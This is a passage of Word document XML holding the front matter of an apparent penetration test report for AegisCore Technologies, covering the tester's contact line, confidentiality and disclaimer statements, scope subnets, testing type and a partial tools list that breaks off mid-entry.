              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Muhammad Zain</w:t>
            </w:r>
            <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> D</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B241E17" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Penetration</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4583" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A31B0A" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Email:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> muhzaindin03@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F560FFD" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B057CB" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F24DC64" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A6D060" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11413E6D" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F5C2D8" w14:textId="77777777" w:rsidR="00AD6E34" w:rsidRPr="00D77DFE" w:rsidRDefault="00AD6E34" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BDF995" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011C914A" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc223521137"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Business</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="EE0000"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:color w:val="EE0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Confidential</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="3FFE7449" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231C460F" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB8644D" w14:textId="71994EBC" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Jan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC8FF3" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Project: CNS-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034BF95F" w14:textId="27CA1C7F" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00395410">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Version: 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019B0B8" w14:textId="77777777" w:rsidR="00887806" w:rsidRPr="00D77DFE" w:rsidRDefault="00887806" w:rsidP="00EE4B82">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255F4681" w14:textId="30F25AF2" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc223521138"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Confidentiality Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="38EAF06A" w14:textId="77777777" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="00FA5020" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251CF795" w14:textId="3B57F8A7" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00FA5020" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains confidential information intended solely for the use of the recipient organization (</w:t>
      </w:r>
      <w:r w:rsidR="001675BC" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>AegisCore Technologies S.A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>) and authorized personnel. Unauthorized access, copying, disclosure, or distribution of any part of this document is strictly prohibited. If you are not the intended recipient, please notify the sender and destroy this document immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352D2A3" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FD4C2D" w14:textId="1C7D0566" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="001E5C24">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc223521139"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="60AAB22D" w14:textId="6D12F8C0" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This report reflects findings from the defined assessment period and scope. It does not guarantee identification of all vulnerabilities, and the tester is not liable for incidents in untested or undisclosed areas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AA2FA" w14:textId="2EBAF27B" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="00FA5020" w:rsidP="00FA5020">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59625DEE" w14:textId="7945B4EB" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="00D77DFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc223521140"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assessment Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="396C26FF" w14:textId="02B8AF91" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The penetration test evaluated AegisCore’s web applications and systems, simulating real-world attacks to identify vulnerabilities and provide remediation. Activities included automated/manual discovery, safe proof-of-concept exploits, and review of configurations, access controls, and input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1837BE19" w14:textId="433D5119" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc223521141"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assessment Components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="2D8490B0" w14:textId="0BF68586" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> all subnets used in AegisCore’s environment (10.0.2.0/24, 10.0.3.0/24, 10.0.4.0/24)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, supporting services and endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF6DFA" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Black-box</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> / External Web Application Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521AF8F2" w14:textId="44AC8ACB" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: Burp Suite,</w:t>
      </w:r>
      <w:r w:rsidR="00812034" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP ZAP Proxy,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
